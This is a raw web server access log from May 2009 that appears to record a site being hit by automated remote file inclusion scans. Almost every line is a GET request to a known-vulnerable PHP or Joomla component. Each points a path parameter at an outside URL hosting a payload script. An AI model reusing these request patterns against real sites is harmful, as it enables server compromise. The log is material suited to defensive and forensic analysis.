89.234.63.110 - - [31/May/2009:04:04:01 -0400] "GET /log/sdaglobal.org-access_log.1//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 352
85.18.117.101 - - [31/May/2009:04:05:10 -0400] "GET //search/**-screens-ppa-inc-functions.inc....php-sources-template.php/admin.php?include_path=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 359
85.18.117.101 - - [31/May/2009:04:05:10 -0400] "GET /log//search/**-screens-ppa-inc-functions.inc....php-sources-template.php/admin.php?include_path=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 363
85.18.117.101 - - [31/May/2009:04:05:11 -0400] "GET /log/sdaglobal.org-access_log%20%20//search/**-screens-ppa-inc-functions.inc....php-sources-template.php/admin.php?include_path=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 390
221.139.104.104 - - [31/May/2009:04:05:49 -0400] "GET /log/sdaglobal.org-access_log%20%20//include/bbs.lib.inc.php?site_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 336
89.234.63.110 - - [31/May/2009:04:06:14 -0400] "GET /log/sdaglobal.org-access_log.4//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 352
221.139.104.104 - - [31/May/2009:04:06:39 -0400] "GET /log/sdaglobal.org-access_log.1%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 366
85.18.117.101 - - [31/May/2009:04:10:30 -0400] "GET /log/sdaglobal.org-access_log//search/**-screens-ppa-inc-functions.inc....php-sources-template.php/admin.php?include_path=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 388
195.34.78.110 - - [31/May/2009:04:11:05 -0400] "GET /log/sdaglobal.org-access_log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 384
195.34.78.110 - - [31/May/2009:04:11:07 -0400] "GET /log/sdaglobal.org-access_log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 384
89.223.3.98 - - [31/May/2009:04:11:39 -0400] "GET /log/sdaglobal.org-access_log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 383
89.223.3.98 - - [31/May/2009:04:11:46 -0400] "GET /log/sdaglobal.org-access_log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 383
195.34.78.110 - - [31/May/2009:04:11:58 -0400] "GET /log/sdaglobal.org-access_log.1%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 386
195.34.78.110 - - [31/May/2009:04:11:59 -0400] "GET /log/sdaglobal.org-access_log.1%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 386
86.39.131.85 - - [31/May/2009:04:12:21 -0400] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://motorcrew.co.kr/home/img/kernel/lib/s/id8.txt??? HTTP/1.1" 404 321
86.39.131.85 - - [31/May/2009:04:12:21 -0400] "GET /log/sdaglobal.org-access_log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://motorcrew.co.kr/home/img/kernel/lib/s/id8.txt??? HTTP/1.1" 404 350
86.39.131.85 - - [31/May/2009:04:12:21 -0400] "GET /log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://motorcrew.co.kr/home/img/kernel/lib/s/id8.txt??? HTTP/1.1" 404 325
221.139.104.104 - - [31/May/2009:04:12:24 -0400] "GET /log/sdaglobal.org-access_log.1%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 366
203.194.204.129 - - [31/May/2009:04:12:56 -0400] "GET /includes/functions_admin.php?phpbb_root_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 309
203.194.204.129 - - [31/May/2009:04:12:56 -0400] "GET /log/sdaglobal.org-access_log%20%20/includes/functions_admin.php?phpbb_root_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 340
203.194.204.129 - - [31/May/2009:04:12:56 -0400] "GET /log/includes/functions_admin.php?phpbb_root_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 313
123.143.98.5 - - [31/May/2009:04:13:00 -0400] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.itemsnsale.com//js/id1.txt?? HTTP/1.1" 404 315
123.143.98.5 - - [31/May/2009:04:13:00 -0400] "GET /log/sdaglobal.org-access_log%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.itemsnsale.com//js/id1.txt?? HTTP/1.1" 404 346
123.143.98.5 - - [31/May/2009:04:13:00 -0400] "GET /log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.itemsnsale.com//js/id1.txt?? HTTP/1.1" 404 319
221.139.104.104 - - [31/May/2009:04:13:22 -0400] "GET /log/sdaglobal.org-access_log%20%20//include/bbs.lib.inc.php?site_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 336
86.39.131.85 - - [31/May/2009:04:13:35 -0400] "GET /log/sdaglobal.org-error_log.1/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://motorcrew.co.kr/home/img/kernel/lib/s/id8.txt??? HTTP/1.1" 404 360
86.39.131.85 - - [31/May/2009:04:13:35 -0400] "GET /log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://motorcrew.co.kr/home/img/kernel/lib/s/id8.txt??? HTTP/1.1" 404 334
86.39.131.85 - - [31/May/2009:04:13:35 -0400] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://motorcrew.co.kr/home/img/kernel/lib/s/id8.txt??? HTTP/1.1" 404 330
86.39.131.85 - - [31/May/2009:04:13:49 -0400] "GET /log/sdaglobal.org-error_log.1/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://motorcrew.co.kr/home/img/kernel/lib/s/id8.txt??? HTTP/1.1" 404 351
86.39.131.85 - - [31/May/2009:04:14:07 -0400] "GET /log/sdaglobal.org-access_log.1/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://motorcrew.co.kr/home/img/kernel/lib/s/id8.txt??? HTTP/1.1" 404 361
200.142.148.142 - - [31/May/2009:04:14:27 -0400] "GET /log//include/bbs.lib.inc.php?site_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 309
200.142.148.142 - - [31/May/2009:04:14:45 -0400] "GET /log/sdaglobal.org-access_log//include/bbs.lib.inc.php?site_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 334
203.194.204.129 - - [31/May/2009:04:14:49 -0400] "GET /includes/functions_admin.php?phpbb_root_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 309
203.194.204.129 - - [31/May/2009:04:14:49 -0400] "GET /log/sdaglobal.org-access_log/includes/functions_admin.php?phpbb_root_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 338
203.194.204.129 - - [31/May/2009:04:14:49 -0400] "GET /log/includes/functions_admin.php?phpbb_root_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 313
86.39.131.85 - - [31/May/2009:04:16:30 -0400] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://motorcrew.co.kr/home/img/kernel/lib/s/id8.txt??? HTTP/1.1" 404 331
86.39.131.85 - - [31/May/2009:04:16:31 -0400] "GET /log/sdaglobal.org-error_log.1/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://motorcrew.co.kr/home/img/kernel/lib/s/id8.txt??? HTTP/1.1" 404 361
86.39.131.85 - - [31/May/2009:04:16:31 -0400] "GET /log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://motorcrew.co.kr/home/img/kernel/lib/s/id8.txt??? HTTP/1.1" 404 335
86.39.131.85 - - [31/May/2009:04:17:46 -0400] "GET /log/sdaglobal.org-access_log.1/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://motorcrew.co.kr/home/img/kernel/lib/s/id8.txt??? HTTP/1.1" 404 362
221.139.104.104 - - [31/May/2009:04:19:01 -0400] "GET /log/sdaglobal.org-access_log.3//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 364
221.139.104.104 - - [31/May/2009:04:19:01 -0400] "GET /log/sdaglobal.org-access_log.1//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 364
86.39.131.85 - - [31/May/2009:04:20:35 -0400] "GET /log/sdaglobal.org-access_log.1%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://motorcrew.co.kr/home/img/kernel/lib/s/id8.txt??? HTTP/1.1" 404 362
86.39.131.85 - - [31/May/2009:04:20:57 -0400] "GET /log/sdaglobal.org-access_log.1%20/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://motorcrew.co.kr/home/img/kernel/lib/s/id8.txt??? HTTP/1.1" 404 363
124.217.216.86 - - [31/May/2009:04:21:26 -0400] "GET /log/sdaglobal.org-access_log.4/?DOCUMENT_ROOT=http://largeface.com/gnuboard4/tail/fid.txt????? HTTP/1.1" 404 312
124.217.216.86 - - [31/May/2009:04:21:26 -0400] "GET /?DOCUMENT_ROOT=http://largeface.com/gnuboard4/tail/fid.txt????? HTTP/1.1" 200 9432
124.217.216.86 - - [31/May/2009:04:21:26 -0400] "GET /log/?DOCUMENT_ROOT=http://largeface.com/gnuboard4/tail/fid.txt????? HTTP/1.1" 200 58208
218.150.78.203 - - [31/May/2009:04:21:37 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.triton-friendlyclub.com/2009/v5id1.txt?? HTTP/1.1" 404 343
218.150.78.203 - - [31/May/2009:04:21:37 -0400] "GET /log/sdaglobal.org-access_log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.triton-friendlyclub.com/2009/v5id1.txt?? HTTP/1.1" 404 372
218.150.78.203 - - [31/May/2009:04:21:38 -0400] "GET /log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.triton-friendlyclub.com/2009/v5id1.txt?? HTTP/1.1" 404 347
221.139.104.104 - - [31/May/2009:04:22:18 -0400] "GET /log/sdaglobal.org-access_log.3//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 364
200.142.148.142 - - [31/May/2009:04:22:18 -0400] "GET /log/sdaglobal.org-access_log.3//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 364
221.139.104.104 - - [31/May/2009:04:22:18 -0400] "GET /log/sdaglobal.org-access_log.1//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 364
116.36.213.166 - - [31/May/2009:04:22:55 -0400] "GET /log/sdaglobal.org-access_log.4/?DOCUMENT_ROOT=http://stelsis.ru//templates/fxid.txt? HTTP/1.1" 404 312
116.36.213.166 - - [31/May/2009:04:22:56 -0400] "GET /log/?DOCUMENT_ROOT=http://stelsis.ru//templates/fxid.txt? HTTP/1.1" 200 58214
116.36.213.166 - - [31/May/2009:04:23:00 -0400] "GET /?DOCUMENT_ROOT=http://stelsis.ru//templates/fxid.txt? HTTP/1.1" 200 9432
221.139.104.104 - - [31/May/2009:04:23:10 -0400] "GET /log/?DOCUMENT_ROOT=http://largeface.com/gnuboard4/tail/fid.txt? HTTP/1.1" 200 58217
221.139.104.104 - - [31/May/2009:04:23:16 -0400] "GET /?DOCUMENT_ROOT=http://largeface.com/gnuboard4/tail/fid.txt? HTTP/1.1" 200 9432
221.139.104.104 - - [31/May/2009:04:23:18 -0400] "GET /log/sdaglobal.org-access_log.4/?DOCUMENT_ROOT=http://largeface.com/gnuboard4/tail/fid.txt? HTTP/1.1" 404 312
124.217.216.86 - - [31/May/2009:04:23:47 -0400] "GET /log/sdaglobal.org-access_log.4%20%20/?DOCUMENT_ROOT=http://largeface.com/gnuboard4/tail/fid.txt????? HTTP/1.1" 404 314
89.223.3.98 - - [31/May/2009:04:27:30 -0400] "GET /components/com_forum/download.php?phpbb_root_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 314
89.223.3.98 - - [31/May/2009:04:27:30 -0400] "GET /log/components/com_forum/download.php?phpbb_root_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 318
89.223.3.98 - - [31/May/2009:04:27:30 -0400] "GET /log/sdaglobal.org-access_log.3%20%20/components/com_forum/download.php?phpbb_root_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 347
114.137.220.69 - - [31/May/2009:04:27:30 -0400] "GET /images/china.gif HTTP/1.1" 200 3479
114.137.220.69 - - [31/May/2009:04:27:30 -0400] "GET /images/chinese.gif HTTP/1.1" 200 3578
89.223.3.98 - - [31/May/2009:04:27:31 -0400] "GET /components/com_forum/download.php?phpbb_root_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 314
89.223.3.98 - - [31/May/2009:04:27:31 -0400] "GET /log/components/com_forum/download.php?phpbb_root_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 318
89.223.3.98 - - [31/May/2009:04:27:31 -0400] "GET /log/sdaglobal.org-access_log.3%20%20/components/com_forum/download.php?phpbb_root_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 347
218.150.78.203 - - [31/May/2009:04:28:34 -0400] "GET /log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.triton-friendlyclub.com/2009/v5id1.txt?? HTTP/1.1" 404 347
218.150.78.203 - - [31/May/2009:04:28:34 -0400] "GET /log/sdaglobal.org-access_log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.triton-friendlyclub.com/2009/v5id1.txt?? HTTP/1.1" 404 374
218.150.78.203 - - [31/May/2009:04:28:34 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.triton-friendlyclub.com/2009/v5id1.txt?? HTTP/1.1" 404 343
89.223.3.98 - - [31/May/2009:04:29:23 -0400] "GET /log/sdaglobal.org-access_log.1%20%20/components/com_forum/download.php?phpbb_root_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 347
89.223.3.98 - - [31/May/2009:04:29:26 -0400] "GET /log/sdaglobal.org-access_log.1%20%20/components/com_forum/download.php?phpbb_root_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 347
67.212.165.114 - - [31/May/2009:04:32:43 -0400] "GET /log/sdaglobal.org-access_log.4//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 349
91.206.183.148 - - [31/May/2009:04:33:22 -0400] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.mecgrassroots.org/wp-content/themes/talian-10/images/id.txt??? HTTP/1.1" 404 321
91.206.183.148 - - [31/May/2009:04:33:23 -0400] "GET /log/sdaglobal.org-access_log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.mecgrassroots.org/wp-content/themes/talian-10/images/id.txt??? HTTP/1.1" 404 350
91.206.183.148 - - [31/May/2009:04:33:23 -0400] "GET /log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.mecgrassroots.org/wp-content/themes/talian-10/images/id.txt??? HTTP/1.1" 404 325
116.36.213.166 - - [31/May/2009:04:33:41 -0400] "GET /log/sdaglobal.org-access_log.4%20%20/?DOCUMENT_ROOT=http://stelsis.ru//templates/fxid.txt? HTTP/1.1" 404 314
116.36.213.166 - - [31/May/2009:04:33:55 -0400] "GET /log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 337
116.36.213.166 - - [31/May/2009:04:33:59 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 333
116.36.213.166 - - [31/May/2009:04:34:00 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 333
116.36.213.166 - - [31/May/2009:04:34:00 -0400] "GET /log/sdaglobal.org-access_log.1%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 366
116.36.213.166 - - [31/May/2009:04:34:01 -0400] "GET /log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 337
116.36.213.166 - - [31/May/2009:04:34:02 -0400] "GET /log/sdaglobal.org-access_log.1%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 366
91.206.183.148 - - [31/May/2009:04:34:17 -0400] "GET /log/sdaglobal.org-error_log.1/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.mecgrassroots.org/wp-content/themes/talian-10/images/id.txt??? HTTP/1.1" 404 351
116.36.213.166 - - [31/May/2009:04:34:57 -0400] "GET /log/sdaglobal.org-access_log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 364
124.0.73.2 - - [31/May/2009:04:34:59 -0400] "GET /log/sdaglobal.org-access_log.4//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 352
116.36.213.166 - - [31/May/2009:04:35:01 -0400] "GET /log/sdaglobal.org-access_log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 364
195.34.78.110 - - [31/May/2009:04:36:30 -0400] "GET /log/sdaglobal.org-access_log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 382
195.34.78.110 - - [31/May/2009:04:36:38 -0400] "GET /log/sdaglobal.org-access_log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 382
89.223.3.98 - - [31/May/2009:04:36:50 -0400] "GET /log/sdaglobal.org-access_log.3/components/com_forum/download.php?phpbb_root_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 345
89.223.3.98 - - [31/May/2009:04:37:13 -0400] "GET /log/sdaglobal.org-access_log.1/components/com_forum/download.php?phpbb_root_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 345
91.206.183.148 - - [31/May/2009:04:37:58 -0400] "GET /log/sdaglobal.org-access_log.3//modules/TotalCalendar/about.php?inc_dir=http://www.mecgrassroots.org/wp-content/themes/talian-10/images/id.txt??? HTTP/1.1" 404 344
91.206.183.148 - - [31/May/2009:04:37:58 -0400] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.mecgrassroots.org/wp-content/themes/talian-10/images/id.txt??? HTTP/1.1" 404 313
91.206.183.148 - - [31/May/2009:04:37:58 -0400] "GET /log//modules/TotalCalendar/about.php?inc_dir=http://www.mecgrassroots.org/wp-content/themes/talian-10/images/id.txt??? HTTP/1.1" 404 317
91.206.183.148 - - [31/May/2009:04:38:21 -0400] "GET /log/sdaglobal.org-error_log.1//modules/TotalCalendar/about.php?inc_dir=http://www.mecgrassroots.org/wp-content/themes/talian-10/images/id.txt??? HTTP/1.1" 404 343
203.194.204.129 - - [31/May/2009:04:39:20 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 317
203.194.204.129 - - [31/May/2009:04:39:20 -0400] "GET /log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 321
221.139.104.104 - - [31/May/2009:04:39:36 -0400] "GET /log/sdaglobal.org-access_log.3%20%20/?DOCUMENT_ROOT=http://largeface.com/gnuboard4/tail/fid.txt? HTTP/1.1" 404 314
203.194.204.129 - - [31/May/2009:04:41:00 -0400] "GET /log/sdaglobal.org-access_log.1%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 350
116.36.213.166 - - [31/May/2009:04:41:38 -0400] "GET /log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 337
116.36.213.166 - - [31/May/2009:04:41:38 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 333
116.36.213.166 - - [31/May/2009:04:41:39 -0400] "GET /log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 337
116.36.213.166 - - [31/May/2009:04:41:39 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 333
116.36.213.166 - - [31/May/2009:04:41:39 -0400] "GET /log/sdaglobal.org-access_log.1///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 364
116.36.213.166 - - [31/May/2009:04:41:40 -0400] "GET /log/sdaglobal.org-access_log.1///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 364
221.139.104.104 - - [31/May/2009:04:42:41 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 307
221.139.104.104 - - [31/May/2009:04:42:41 -0400] "GET /log//include/admin.lib.inc.php?site_path=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 311
221.139.104.104 - - [31/May/2009:04:42:41 -0400] "GET /log/sdaglobal.org-access_log.1//include/admin.lib.inc.php?site_path=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 338
221.139.104.104 - - [31/May/2009:04:42:59 -0400] "GET /log/sdaglobal.org-access_log//include/admin.lib.inc.php?site_path=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 336
79.18.233.198 - - [31/May/2009:04:44:06 -0400] "GET /log/sdaglobal.org-access_log.1//components/errors.php?error=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 334
79.18.233.198 - - [31/May/2009:04:44:06 -0400] "GET /log/sdaglobal.org-access_log.1//components/errors.php?error=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 334
79.18.233.198 - - [31/May/2009:04:44:07 -0400] "GET //components/errors.php?error=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 303
79.18.233.198 - - [31/May/2009:04:44:08 -0400] "GET //components/errors.php?error=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 303
79.18.233.198 - - [31/May/2009:04:44:08 -0400] "GET /log//components/errors.php?error=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 307
79.18.233.198 - - [31/May/2009:04:44:08 -0400] "GET /log//components/errors.php?error=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 307
79.18.233.198 - - [31/May/2009:04:44:29 -0400] "GET /log/sdaglobal.org-access_log.1//components/errors.php?error=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 334
79.18.233.198 - - [31/May/2009:04:44:30 -0400] "GET //components/errors.php?error=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 303
79.18.233.198 - - [31/May/2009:04:44:31 -0400] "GET /log//components/errors.php?error=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 307
116.36.213.166 - - [31/May/2009:04:52:53 -0400] "GET /log/sdaglobal.org-access_log.1%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 366
79.18.233.198 - - [31/May/2009:04:56:40 -0400] "GET /log/sdaglobal.org-access_log.1//components/errors.php?error=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 334
79.18.233.198 - - [31/May/2009:04:56:40 -0400] "GET //components/errors.php?error=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 303
79.18.233.198 - - [31/May/2009:04:56:41 -0400] "GET /log//components/errors.php?error=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 307
200.142.148.142 - - [31/May/2009:04:56:55 -0400] "GET /log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 337
200.142.148.142 - - [31/May/2009:04:56:55 -0400] "GET /log/sdaglobal.org-access_log.3//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 364
200.142.148.142 - - [31/May/2009:04:57:16 -0400] "GET /log/sdaglobal.org-access_log.1//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 364
112.175.141.41 - - [31/May/2009:05:00:36 -0400] "GET /config/dbutil.bck.php?confdir=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 302
112.175.141.41 - - [31/May/2009:05:00:38 -0400] "GET /log/config/dbutil.bck.php?confdir=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 306
112.175.141.41 - - [31/May/2009:05:00:44 -0400] "GET /log/sdaglobal.org-access_log%20%20/config/dbutil.bck.php?confdir=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 333
116.36.213.166 - - [31/May/2009:05:01:28 -0400] "GET /log/sdaglobal.org-access_log.1%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 366
112.175.141.41 - - [31/May/2009:05:02:23 -0400] "GET /log/config/dbutil.bck.php?confdir=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 306
112.175.141.41 - - [31/May/2009:05:02:25 -0400] "GET /config/dbutil.bck.php?confdir=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 302
112.175.141.41 - - [31/May/2009:05:02:25 -0400] "GET /log/sdaglobal.org-access_log%20%20/config/dbutil.bck.php?confdir=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 333
216.221.10.116 - - [31/May/2009:05:02:59 -0400] "GET ///modules/xfsection/modify.php?dir_module=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 311
216.221.10.116 - - [31/May/2009:05:02:59 -0400] "GET /log///modules/xfsection/modify.php?dir_module=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 315
216.221.10.116 - - [31/May/2009:05:02:59 -0400] "GET /log/sdaglobal.org-error_log.1%20%20///modules/xfsection/modify.php?dir_module=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 343
216.221.10.116 - - [31/May/2009:05:03:07 -0400] "GET /log/sdaglobal.org-access_log.4%20%20///modules/xfsection/modify.php?dir_module=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 344
112.175.141.41 - - [31/May/2009:05:04:35 -0400] "GET /log/sdaglobal.org-access_log.4%20%20/config/dbutil.bck.php?confdir=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 335
116.36.213.166 - - [31/May/2009:05:05:34 -0400] "GET /log/sdaglobal.org-access_log.1///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 364
116.36.213.166 - - [31/May/2009:05:05:52 -0400] "GET /log/sdaglobal.org-access_log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 362
83.103.72.130 - - [31/May/2009:05:05:57 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 307
83.103.72.130 - - [31/May/2009:05:05:57 -0400] "GET /log//include/admin.lib.inc.php?site_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 311
83.103.72.130 - - [31/May/2009:05:05:57 -0400] "GET /log/sdaglobal.org-access_log//include/admin.lib.inc.php?site_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 336
